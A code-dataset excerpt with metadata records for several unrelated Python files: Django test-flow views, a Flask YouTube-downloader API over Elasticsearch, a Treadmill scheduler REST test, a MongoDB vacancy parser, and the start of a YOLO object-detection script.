show_summary(request, test_set):\r\n    try:\r\n        summary_flow = FlowSummary.objects.filter(test_set=test_set)\r\n        try:\r\n            desc = Document.objects.filter( ~Q(description='') , test_set=test_set )[0].description\r\n            context = {'summary_flow': summary_flow, 'desc':\"Summary result for: \"+desc, 'test_set':test_set}\r\n        except IndexError:\r\n            context = {'summary_flow': summary_flow, 'desc':'no description', 'test_set':test_set}\r\n        return render(request, 'poc/summary.html', context)\r\n    except Flows.DoesNotExist:\r\n        return render(request, 'poc/summary.html')\r\n\r\ndef edit_remark(request):\r\n    if request.method == 'POST':\r\n        test_set = request.POST['test_set']\r\n        remark = request.POST['remark']\r\n        \r\n        print (test_set, remark)\r\n        doc = Document.objects.filter(test_set=test_set)\r\n        for record in doc:\r\n            record.remark = remark\r\n            record.save()\r\n    return 
HttpResponseRedirect(reverse('poc:result'))\n\ndef chart_view(request, flow_id):\n flow_name = get_object_or_404(Flows, id=flow_id).flow_name\n\n #From Chartit.\n #Step 1: Create a DataPool with the data we want to retrieve.\n chartdata = DataPool(\n series=\n [\n {\n 'options': { 'source': Flows.objects.filter(flow_name=flow_name).order_by('-pub_date')[:100] },\n 'terms': ['pub_date','drop_time']\n }\n ]\n )\n #Step 2: Create the Chart object\n cht = Chart(\n datasource = chartdata,\n series_options =\n [{'options':{\n 'type': 'line',\n 'stacking': False\n },\n 'terms':{\n 'pub_date': ['drop_time']\n }\n }],\n chart_options =\n {\n 'chart': {'backgroundColor': '#f2f2f2'},\n 'title': {'text': 'Flow: '+flow_name},\n 'yAxis': {'title' : {'text': 'Drop Time (ms)' }},\n }\n )\n\n #Step 3: Send the chart object to the template.\n return render(request,'poc/chart.html', {'chart': cht})", "sub_path": "poc/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7001, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Document", "line_number": 23, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Document", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 54, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Document.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "models.FlowTemplate.objects.all", "line_number": 61, "usage_type": "call"}, {"api_name": "models.FlowTemplate.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.FlowTemplate", "line_number": 61, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 63, "usage_type": "call"}, {"api_name": "models.FlowTemplate.DoesNotExist", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.FlowTemplate", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Flows.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "models.Flows.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 69, "usage_type": "name"}, {"api_name": "models.Document.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 76, "usage_type": "name"}, {"api_name": 
"django.db.models.Q", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 81, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Document.objects.order_by", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "models.FlowSummary.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.FlowSummary.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.FlowSummary", "line_number": 109, "usage_type": "name"}, {"api_name": "models.Document.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 111, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 116, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Document.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 125, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 129, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Flows", "line_number": 132, "usage_type": "argument"}, {"api_name": "chartit.DataPool", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Flows.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Flows.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 140, "usage_type": "name"}, {"api_name": "chartit.Chart", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "443933999", "text": "# https://github.com/microsoft/pylance-release/issues/236#issuecomment-759828693\nimport json\nimport logging\nfrom flask import Flask, request\nfrom __init__ import setup_logging\nimport urllib3\nimport urllib\nfrom utils.utils import str_to_filename\nimport utils.video_manager as vm\n# import utils.elasticsearch_manager as em \nimport utils.routes_from_file as rff\nimport utils.zip as zip\nimport os\n\n\nlogger = setup_logging()\napp = Flask(__name__)\n\n\ndef try_action(action_fn):\n try: return (action_fn(), 0)\n except Exception as e:\n 
logging.error(e)\n code, reason, *_ = e.args\n return (reason, code)\n\n\n\n\n\n\n\n\n@app.route('/videos/url/')\ndef get_by_url(url = None): \n data, has_error = try_action(lambda: vm.get_video_by_url(url))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(data), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos/id/')\ndef get_by_id(id = None): \n data, has_error = try_action(lambda: vm.get_video_by_id(id))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(data), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos/id/', methods=['PUT'])\ndef update_video(id = None): \n\n # Extract and validate data\n data, has_error = try_action(lambda: vm.video_from_user_data(request.json))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n\n # Have we processed this link before? \n data, has_error = try_action(lambda: vm.get_video_by_id(id))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n if data.get('total') == 0: return json.dumps({\"message\": \"Unknown ID\"}, indent=4), 400, {'ContentType':'application/json'}\n\n # Process submission and validate results\n data, has_error = try_action(lambda: vm.process_video(data, is_new=False))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n \n # Commit results\n data, has_error = try_action(lambda: vm.update_video(id, data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(data, indent=4), 200, {'ContentType':'application/json'}\n\n\n\n@app.route('/videos/new', methods=['POST'])\ndef new_video(): return add_video(request.json)\n\n@app.route('/videos/new/bulk', methods=['POST'])\ndef new_videos(): \n results = [ add_video(video) for video in request.json ]\n response = {\n \"failed\": [ res[0] for res in results if res[1] != 201],\n \"created\": [ res[0] for res in results if res[1] == 201]\n }\n return json.dumps({\"results\": response}, indent=4), 200, {'ContentType':'application/json'}\n\ndef add_video(user_data): \n\n # Extract and validate data\n data, has_error = try_action(lambda: vm.video_from_user_data(user_data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n logging.info(f'Processing user data: \\'{json.dumps(data)}\\'')\n link = data.get('url')\n\n # Have we processed this link before? 
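If so, the lookup below short-circuits and returns the stored record instead of re-downloading.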
\n _data, has_error = try_action(lambda: vm.get_video_by_url(link))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n if _data.get('total') != 0: return json.dumps(_data), 200, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has not been processed before\")\n\n # Process submission and validate results\n data, has_error = try_action(lambda: vm.process_video(data, is_new=True))\n if has_error: return json.dumps({\"message\":data}), has_error, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has been successfully processed: {json.dumps(data)}\")\n\n # Commit results\n data, has_error = try_action(lambda: vm.create_video(data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has been successfully committed: {json.dumps(data)}\")\n return json.dumps(data, indent=4), 201, {'ContentType':'application/json'}\n\n\n\n@app.route('/videos/queries', methods=['POST'])\ndef get_videos_advanced(): \n http = urllib3.PoolManager()\n encoded_data = json.dumps(request.json).encode('utf-8')\n logging.debug('Running elasticsearch query: ' + encoded_data.decode('utf-8'))\n \n data, has_error = try_action(lambda: http.request(\n 'POST', \n vm.get_search_url(prettify=True),\n body = encoded_data,\n headers = {'Content-Type': 'application/json'}\n ))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(json.loads(data.data.decode('utf-8'))), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos')\n@app.route('/videos/')\ndef get_videos(): \n logging.debug(\"Retrieving videos\")\n query = urllib.parse.unquote(request.query_string.decode('utf-8')).replace(\"=\", \":\").replace(\"&\", \" AND \")\n encoded_args = urllib.parse.urlencode({'q': query if query != \"\" else \"*=*\"})\n http = urllib3.PoolManager()\n logging.debug(f\"Retrieving videos with: {json.dumps({'q': query})}\")\n \n # data, has_error = try_action(lambda: http.request('GET', f'http://youtube_downloader_elasticsearch_app_1:9200/videos/_search?{encoded_args}'))\n data, has_error = try_action(lambda: http.request('GET', vm.get_search_url(args=encoded_args)))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(json.loads(data.data.decode('utf-8'))), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/ping')\ndef ping(): return json.dumps({\"code\":200, \"reply\": \"pong\", \"host\": \"backend\"}, indent=4), 200, {'ContentType':'application/json'}\n\n\n@app.route(\"/zip\", methods=['POST'])\ndef archive(): \n logging.debug(\"Zipping videos\")\n\n manifest = [ vm.get_name_from_id(id) for id in request.json ]\n logging.debug(f\"Zip Manifest: {json.dumps(manifest)}\")\n\n\n bundle_name, bundle_path, bundle_url = vm.get_zipfile_details(url_root=request.url_root)\n _data, has_error = try_action(lambda: zip.from_iterator(bundle_path, [ (vm.get_name_from_id(id), vm.get_path_from_id(id)) for id in request.json ] + [(\"manifest.json\", {\"manifest\": manifest})]))\n if has_error: return json.dumps({\"message\": \"Could not bundle videos\", \"data\": _data}, indent=4), has_error, 
{'ContentType':'application/json'}\n logging.debug(f\"Bundle accessible at: {bundle_url}\")\n return json.dumps({\"link\": bundle_url}, indent=4), 200, {'ContentType':'application/json'}\n\n\n@app.route('/')\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/<path>\") \n@app.route(\"/<path:path>\")\ndef home(): return json.dumps({\"approutes\": rff.get_routes(__file__)}, indent=4), 200, {'ContentType':'application/json'}\n\n# https://code-maven.com/python-flask-catch-exception\n@app.errorhandler(Exception)\ndef server_error(err):\n app.logger.exception(err)\n return json.dumps({\"code\":500, \"message\": \"Unexpected Error Occurred\"}, indent=4), 500, {'ContentType':'application/json'}", "sub_path": "youtube_downloader/api/app/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 7844, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "__init__.setup_logging", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_url", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.video_manager.get_video_by_id", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.video_manager.video_from_user_data", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_id", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.video_manager.process_video", "line_number": 59, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 59, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.video_manager.update_video", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.request.json",
"line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.video_manager.video_from_user_data", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_url", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "utils.video_manager.process_video", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 96, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.video_manager.create_video", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 101, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 103, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 104, "usage_type": "call"}, {"api_name": "urllib3.PoolManager", "line_number": 110, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.video_manager.get_search_url", "line_number": 116, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 116, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 121, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 126, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 127, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request.query_string.decode", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.query_string", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 127, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 128, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 128, "usage_type": "attribute"}, {"api_name": "urllib3.PoolManager", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", 
"line_number": 130, "usage_type": "call"}, {"api_name": "utils.video_manager.get_search_url", "line_number": 133, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 133, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 135, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 135, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 138, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.video_manager.get_name_from_id", "line_number": 145, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 146, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.video_manager.get_zipfile_details", "line_number": 149, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.url_root", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "utils.zip.from_iterator", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.zip", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.video_manager.get_name_from_id", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.video_manager.get_path_from_id", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 152, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 153, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.routes_from_file.get_routes", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.routes_from_file", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "613681354", "text": "\"\"\"Scheduler reports REST api tests.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport flask\nimport flask_restplus as restplus\nimport mock\n\nimport pandas as pd\n\nfrom treadmill import webutils\nfrom treadmill.rest import error_handlers\nfrom treadmill.rest.api import scheduler\n\n\nclass ReportTest(unittest.TestCase):\n \"\"\"Test the scheduler reports REST api.\"\"\"\n\n def setUp(self):\n \"\"\"Initialize the app with the corresponding logic.\"\"\"\n self.app = flask.Flask(__name__)\n self.app.testing = True\n\n api = restplus.Api(self.app)\n error_handlers.register(api)\n\n cors = webutils.cors(origin='*',\n content_type='application/json',\n credentials=False)\n self.impl = mock.Mock()\n\n 
scheduler.init(api, cors, self.impl)\n self.client = self.app.test_client()\n\n def test_get(self):\n \"\"\"Test fetching a report.\"\"\"\n self.impl.get.return_value = pd.DataFrame(\n [[1, 2, 3], [4, 5, 6]],\n columns=[\"a\", \"b\", \"c\"]\n )\n\n resp = self.client.get('/scheduler/servers')\n self.assertEqual(\n ''.join(resp.response),\n '{\"data\": [[1, 2, 3], [4, 5, 6]], \"columns\": [\"a\", \"b\", \"c\"]}'\n )\n\n def test_get_match(self):\n \"\"\"Test fetching report with match.\"\"\"\n self.impl.get.return_value = pd.DataFrame(\n [[\"findme\", 2, 3]],\n columns=[\"name\", \"b\", \"c\"]\n )\n self.client.get('/scheduler/servers?match=findme')\n self.impl.get.assert_called_with('servers', match='findme')\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/rest/api/scheduler_test.py", "file_name": "scheduler_test.py", "file_ext": "py", "file_size_in_byte": 1779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 25, "usage_type": "call"}, {"api_name": "flask_restplus.Api", "line_number": 28, "usage_type": "call"}, {"api_name": "treadmill.rest.error_handlers.register", "line_number": 29, "usage_type": "call"}, {"api_name": "treadmill.rest.error_handlers", "line_number": 29, "usage_type": "name"}, {"api_name": "treadmill.webutils.cors", "line_number": 31, "usage_type": "call"}, {"api_name": "treadmill.webutils", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "treadmill.rest.api.scheduler.init", "line_number": 36, "usage_type": "call"}, {"api_name": "treadmill.rest.api.scheduler", "line_number": 36, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "221441772", "text": "import pymongo\nfrom datetime import datetime, timedelta\nimport re\n\narray_vacancies = []\nparsed_vacancy = []\n\n\nclass Data_base:\n def __init__(self, collection_name):\n self.collection_name = collection_name\n\n \"\"\"The connection to the database\"\"\"\n def connect_db(self):\n client = pymongo.MongoClient('192.168.128.231:27017')\n db = client['crawler']\n posts = db[self.collection_name]\n return posts\n\n\nclass Parser_vacancy:\n def __init__(self):\n self.status = 'INATIVE'\n\n \"\"\"this function get vacancies in interval 20 minutes(time create_vacancy + 20 minutes)\"\"\"\n def get_vacancy(self, status):\n array_vacancies.clear()\n data_vacancy = Data_base('vacancy').connect_db()\n # current\n # date_time1 = datetime.today()\n # current - 20\n # date_time2 = timedelta(minutes=20)\n # 'created_date': {'$gte': date_time1 - date_time2, '$lt': date_time1}\n for vacancy in data_vacancy.find({'status': status}):\n self.change_status('vacancy', vacancy)\n array_vacancies.append(vacancy)\n\n # new, in the process, processed\n \"\"\"Change status and modified_date depending on the current\"\"\"\n def change_status(self, name_database, data_vacancy):\n data_base = Data_base(name_database).connect_db()\n if data_vacancy['status'] == 'NEW':\n data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'IN_PROCESS', 'modified_date': datetime.now()}})\n self.status = 'IN_PROCESS'\n elif data_vacancy['status'] == 'IN_PROCESS':\n 
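# an IN_PROCESS record advances to PROCESSED; any other status falls through to FAILED below\n 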
data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'PROCESSED', 'modified_date': datetime.now()}})\n self.status = 'PROCESSED'\n else:\n data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'FAILED', 'modified_date': datetime.today()}})\n self.status = 'FAILED'\n\n \"\"\"Cleaning raw from others symbols, signs, stop_words. And division the words\"\"\"\n def set_parsed_vacancy(self):\n try:\n parsed_vacancy.clear()\n data_base = Data_base('parsed_vacancy').connect_db()\n self.get_vacancy('IN_PROCESS')\n for vacancy in array_vacancies:\n reg = re.compile(\"[^а-яёїієґьщ'a-z0-9 ]+-\")\n words = reg.sub('', vacancy['raw'])\n for junk_char in \"%$@*.!&,:;•/\\—)[]+(»«\":\n words = words.replace(junk_char, ' ')\n skills = self.check_stop_words(words.split())\n parsed_vacancy.append(\n {\n 'vacancy_id': vacancy['_id'],\n 'crawler_id': vacancy['crawler_id'],\n 'link': vacancy['link'],\n 'raw_vacancy': list(set(skills)),\n 'status': 'NEW',\n 'created_date': datetime.today(),\n 'modified_date': datetime.today()\n })\n self.change_status('vacancy', vacancy)\n data_base.insert_many(parsed_vacancy)\n except:\n self.status = 'FAILED'\n\n def check_stop_words(self, words):\n data_stop_word = Data_base('stop_words').connect_db()\n for word in words:\n for stop_word in data_stop_word.find({}):\n if word == stop_word['key']:\n words.remove(word)\n return words\n\n def run(self):\n \"\"\"To collect all vacancies with status NEW\"\"\"\n self.get_vacancy('NEW')\n \"\"\"Main function for document parsed_vacancy\"\"\"\n self.set_parsed_vacancy()\n\n# parser = Parser_vacancy()\n# parser.run()", "sub_path": "parser/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "526474941", "text": "import cv2\nimport numpy as np\nimport time\n#import imutils\n#import serial\n\n#serial initialiaztiom\n#ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\n#ser.flush()\n\n# Load Yolo\nnet = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\")\nclasses = []\nwith open(\"coco.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\nfont = cv2.FONT_HERSHEY_PLAIN\nx_ = cv2.CAP_PROP_FRAME_WIDTH\ny_ = cv2.CAP_PROP_FRAME_HEIGHT\n# Loading image\ncap = cv2.VideoCapture(0)\n\ntime_start = time.time()\nframe_id = 0\nwhile True:\n \n # 
